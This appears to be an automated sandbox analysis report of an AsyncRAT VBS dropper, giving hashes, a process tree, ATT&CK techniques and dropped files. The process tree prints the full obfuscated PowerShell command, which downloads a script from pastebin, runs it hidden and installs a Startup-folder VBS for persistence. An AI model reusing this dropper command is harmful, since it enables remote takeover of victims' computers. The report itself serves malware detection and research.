asyncrat | 9901fffc81769726c5217dfc2db580c1b67ad476f59451f9af8254c66966dafa

Analysis

max time kernel
68s
max time network
111s
platform
windows10_x64
resource
win10v20210408
submitted
07-05-2021 10:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ASG.vbs
Size

9KB
MD5

0a2a8aa3944b6f377ac18361e351ab26
SHA1

7d647c28efd45c8f0c38d30235308187e5f96d29
SHA256

9901fffc81769726c5217dfc2db580c1b67ad476f59451f9af8254c66966dafa
SHA512

1d66f8ce7d30e0f462a8751d98dbddc561908171728ba44fb56145cd03e4f18659c6e7fb151e27714f38990ac4e973773f36f246a1c680b1288cc089cadcf4e8

Score

10^/10

asyncrat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/y3Yp0yTh

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4540-195-0x000000000040C73E-mapping.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

10 4280 powershell.exe
Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin32Bits89.vbs powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1796 set thread context of 4540 1796 powershell.exe RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1040 timeout.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

4280 powershell.exe
4280 powershell.exe
4280 powershell.exe
1796 powershell.exe
1796 powershell.exe
1796 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exeRegSvcs.exe

description pid process

Token: SeDebugPrivilege 4280 powershell.exe
Token: SeDebugPrivilege 1796 powershell.exe
Token: SeDebugPrivilege 4540 RegSvcs.exe

flow	pid	process
10	4280	powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin32Bits89.vbs	powershell.exe

description	pid	process	target process
PID 1796 set thread context of 4540	1796	powershell.exe	RegSvcs.exe

pid	process
1040	timeout.exe

pid	process
4280	powershell.exe
4280	powershell.exe
4280	powershell.exe
1796	powershell.exe
1796	powershell.exe
1796	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	4540	RegSvcs.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

WScript.execmd.exepowershell.exepowershell.execsc.exeRegSvcs.execmd.exe

description	pid	process	target process
PID 4812 wrote to memory of 1520	4812	WScript.exe	cmd.exe
PID 4812 wrote to memory of 1520	4812	WScript.exe	cmd.exe
PID 1520 wrote to memory of 4280	1520	cmd.exe	powershell.exe
PID 1520 wrote to memory of 4280	1520	cmd.exe	powershell.exe
PID 4280 wrote to memory of 1796	4280	powershell.exe	powershell.exe
PID 4280 wrote to memory of 1796	4280	powershell.exe	powershell.exe
PID 1796 wrote to memory of 4332	1796	powershell.exe	csc.exe
PID 1796 wrote to memory of 4332	1796	powershell.exe	csc.exe
PID 4332 wrote to memory of 4564	4332	csc.exe	cvtres.exe
PID 4332 wrote to memory of 4564	4332	csc.exe	cvtres.exe
PID 1796 wrote to memory of 4540	1796	powershell.exe	RegSvcs.exe
PID 1796 wrote to memory of 4540	1796	powershell.exe	RegSvcs.exe
PID 1796 wrote to memory of 4540	1796	powershell.exe	RegSvcs.exe
PID 1796 wrote to memory of 4540	1796	powershell.exe	RegSvcs.exe
PID 1796 wrote to memory of 4540	1796	powershell.exe	RegSvcs.exe
PID 1796 wrote to memory of 4540	1796	powershell.exe	RegSvcs.exe
PID 1796 wrote to memory of 4540	1796	powershell.exe	RegSvcs.exe
PID 1796 wrote to memory of 4540	1796	powershell.exe	RegSvcs.exe
PID 4540 wrote to memory of 576	4540	RegSvcs.exe	cmd.exe
PID 4540 wrote to memory of 576	4540	RegSvcs.exe	cmd.exe
PID 4540 wrote to memory of 576	4540	RegSvcs.exe	cmd.exe
PID 576 wrote to memory of 1040	576	cmd.exe	timeout.exe
PID 576 wrote to memory of 1040	576	cmd.exe	timeout.exe
PID 576 wrote to memory of 1040	576	cmd.exe	timeout.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ASG.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -WindowStyle Hidden -Command "IEX ([System.Text.Encoding]::UTF8.GetString(@(35,82,101,97,100,32,67,111,110,116,101,110,116,32,79,102,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,93,32,36,83,116,114,101,97,109,32,61,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,79,112,101,110,82,101,97,100,40,34,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,121,51,89,112,48,121,84,104,34,41,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,93,32,36,83,82,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,32,36,83,116,114,101,97,109,13,10,91,83,116,114,105,110,103,93,32,36,82,101,113,32,61,32,36,83,82,46,82,101,97,100,84,111,69,110,100,40,41,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,54,48,48,48,41,13,10,13,10,35,67,114,101,97,116,101,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,79,110,32,72,97,114,100,32,68,105,115,107,32,33,13,10,91,83,116,114,105,110,103,93,32,36,84,69,77,80,32,61,32,36,101,110,118,58,84,69,77,80,32,43,32,34,92,34,32,43,32,34,83,121,115,84,114,97,121,46,80,83,49,34,13,10,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,69,77,80,44,32,36,82,101,113,41,13,10,13,10,35,83,116,97,114,116,117,112,32,73,110,115,116,97,108,108,97,116,105,111,110,13,10,70,117,110,99,116,105,111,110,32,73,78,83,84,65,76,76,40,41,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,86,66,83,82,117,110,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,83,116,114,105,110,103,40,64,40,56,51,44,49,48,49,44,49,49,54,44,51,50,44,55,57,44,57,56,44,49,48,54,44,51,50,44,54,49,44,51,50,44,54,55,44,49,49,52,44,49,48,49,44,57,55,44,49,49,54,44,49,48,49,44,55,57,44,57,56,44,49,48,54,44,49,48,49,44,57,57,44,49,49,54,44,52,48,44,51,52,44,56,55,44,56,51,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,52,44,52,49,44,49,51,44,49,48,44,55,57,44,57,56,44,49,48,54,44,52,54,44,56,50,44,49,49,55,44,49,49,48,44,51,50,44,51,52,44,56,48,44,49,49,49,44,49,49,57,44,49,48,49,44,49,49,52,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,50,44,52,53,44,54,57,44,49,50,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,56,48,44,49,49,49,44,49,48,56,44,49,48,53,44,57,57,44,49,50,49,44,51,50,44,56,50,44,49,48,49,44,49,48,57,44,49,49,49,44,49,49,54,44,49,48,49,44,56,51,44,49,48,53,44,49,48,51,44,49,49,48,44,49,48,49,44,49,48,48,44,51,50,44,52,53,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,51,50,44,51,52,44,51,50,44,51,56,44,51,50,44,51,52,44,51,55,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,56,48,44,57,55,44,49,49,54,44,49,48,52,44,51,55,44,51,52,44,52,52,44,51,50,44,52,56,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,83,121,115,116,101,109,76,111,103,105,110,51,50,66,105,116,115,56,57,46,118,98,115,34,41,44,32,36,86,66,83,82,117,110,46,82,101,112,108,97,99,101,40,34,37,70,105,108,101,80,97,116,104,37,34,44,32,36,84,69,77,80,41,41,13,10,125,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,41,13,10,13,10,35,82,117,110,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,73,78,83,84,65,76,76,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,36,84,69,77,80,34)))"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1whvrcjb\1whvrcjb.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:4332

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D01.tmp" "c:\Users\Admin\AppData\Local\Temp\1whvrcjb\CSC63AA1F0C68D4689BBC5BA7CBEAE355D.TMP"
6⤵
PID:4564

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5FF3.tmp.bat""
6⤵
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\SysWOW64\timeout.exe
timeout 3
7⤵
- Delays execution with timeout.exe
PID:1040

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
5626c497c0e86c30a66047154bc10781

SHA1
ff3a384738ac4b04808296f5aaf73044e2dcf2e1

SHA256
00b535a8e4d419905d017d78bc162b575d2b74d9825b89ccbaed85de3602125b

SHA512
921ef32367c46f399b6abbee99d0acc96a3c4b76701c641a479b48119f3e91dcd6d4e88f1ef4ee21cb7ea3ea4d623f8c5e011ce3f0bc9b11082734fc76016a04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
f18ec17e9e085177c47255bc81019511

SHA1
67d8add4d7fec885a0f6fe9ec2e8e696cc1f98a1

SHA256
4222fde33f9ed2dc93a7acd7644cf4da606c36884d6a16256c33c7e72487a7f0

SHA512
e5c48fe99dc4fdae753805a42a8cf2bb7dc92e4b7c51169aa1800c5f07b5b33206cdea743a5c3a2c2631e37f3a9c6f91d7c934101e944231aa5dcfdbcf7f259d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat
MD5
e39cc313b782f4cf064af5388262eb81

SHA1
9187257f07e28f14f6b782c50a25edafa17106fa

SHA256
2f0661d6cab09560d9441fd8213e6d79d57f7f369a340b41404064bb69359e37

SHA512
3d67f7dccd4ae56cdbf078fab17c0ce569e754694972d7d26bf7a19a524bdb552b548d845d44ef355a23a5a5be624366ceef60c797a0b3147f676194c748322e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1whvrcjb\1whvrcjb.dll
MD5
47f900e2308ff040686699ee5a896edc

SHA1
fb3bf8815c77ceca9ce00c22fcc2c29950279636

SHA256
ca8d8ea2851448314cdf8513dd8590c1234585bc892838e06dc8c530b3485065

SHA512
7027ff395e294690337d56cdce4364ab8a0cf506fed76a73f7595070193f71c243035fe139dfcb68aa17da07d3ac2674b8e304c4c74be30caafccbd329ea64cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9D01.tmp
MD5
de47bbc4cf0bbd1632dca702e2ad7cf9

SHA1
0d398aa74c0ddfdc5339e36d1dd63ddb4c6a7eac

SHA256
f8e1553a60c949c8ac547db2048cc0b6cab7cc2d382b8079bba3bfa2865fa191

SHA512
a1d1d92dce2c502c19dfc0a11e98d44c1a136036468212629e0523b164a1f6856ffc19bd0fe99852916b41b0b14cf42425bfc33873796e1530125f4aeb08e1fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
MD5
4f95a975b942949d4f39fb63af105d97

SHA1
b9e39ef492d708a567192a766c39b43de8750a3c

SHA256
6a5b719d891f1eb61d97257cec527d2dfd7a480cb62dce353fbc445306e17cde

SHA512
8ea9e26c03b475fc6d4ffd0a00db0513c123f574a34c546af5341d4791dbc5707b5870f037bfb02628ed0be4c446f6d9f35b50d3deb47a7c86aab25b10b0f6c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp5FF3.tmp.bat
MD5
15f6a568d29b8081dc0d6624f6ecf84f

SHA1
c12db3df3f399633935c5d834b454c29124faa76

SHA256
53707dba74423b19cab0160cbc9c7345700d76a90b31562f4bb48f453c861f0c

SHA512
51cee9893008180409d5f9f75ff38ffb67b9c599186a757ae9f870831841e494c35d32802192521018069b083040a645e66223b543b80da47993a1fe13170a87

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1whvrcjb\1whvrcjb.0.cs
MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1whvrcjb\1whvrcjb.cmdline
MD5
268900516104939c8c4e4438d528261a

SHA1
b6fdfcabdf1fca7d13b36bc53b157297ea5c1781

SHA256
bc348191a210cdf3eb62d7f53073c6ee6a98dc5b6d8a36af854b9f9e258a4fb2

SHA512
99e6afeeecca746167789595f98296182900e55d3e60638a83f74e3d19f36eef7242bf3bd5df3e62936f427aa856c3924457b51aae91b8bb7c42d211631a19db

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1whvrcjb\CSC63AA1F0C68D4689BBC5BA7CBEAE355D.TMP
MD5
3d217c3b3363234c41dbb5447acea449

SHA1
09944e2688d0bbfb1f47f804895d753781def6e3

SHA256
a7a98bb6a7bcb7d5c20e5a086c54064e2990346239ca658dedd12debdc871b48

SHA512
0596c420f3fa5f160dc5664023f0b08c3eb456669e6e5e52b6148e6c9e0617a5a99be78b0ec47397ae9f58c8cc92c9419adcf069617547ddcf1134bfc19771bd

Download Submit
memory/576-200-0x0000000000000000-mapping.dmp

Download
memory/1040-202-0x0000000000000000-mapping.dmp

Download
memory/1520-114-0x0000000000000000-mapping.dmp

Download
memory/1796-143-0x0000026B0CCE0000-0x0000026B0CCE2000-memory.dmp

Filesize
8KB

Download
memory/1796-145-0x0000026B0CCE3000-0x0000026B0CCE5000-memory.dmp

Filesize
8KB

Download
memory/1796-135-0x0000000000000000-mapping.dmp

Download
memory/1796-198-0x0000026B0CCE6000-0x0000026B0CCE8000-memory.dmp

Filesize
8KB

Download
memory/4280-132-0x000002477A540000-0x000002477A542000-memory.dmp

Filesize
8KB

Download
memory/4280-134-0x000002477A546000-0x000002477A548000-memory.dmp

Filesize
8KB

Download
memory/4280-133-0x000002477A543000-0x000002477A545000-memory.dmp

Filesize
8KB

Download
memory/4280-127-0x000002477C7D0000-0x000002477C7D1000-memory.dmp

Filesize
4KB

Download
memory/4280-122-0x000002477C620000-0x000002477C621000-memory.dmp

Filesize
4KB

Download
memory/4280-116-0x0000000000000000-mapping.dmp

Download
memory/4332-188-0x0000000000000000-mapping.dmp

Download
memory/4540-195-0x000000000040C73E-mapping.dmp

Download
memory/4540-199-0x00000000029E0000-0x00000000029E1000-memory.dmp

Filesize
4KB

Download
memory/4564-191-0x0000000000000000-mapping.dmp

Download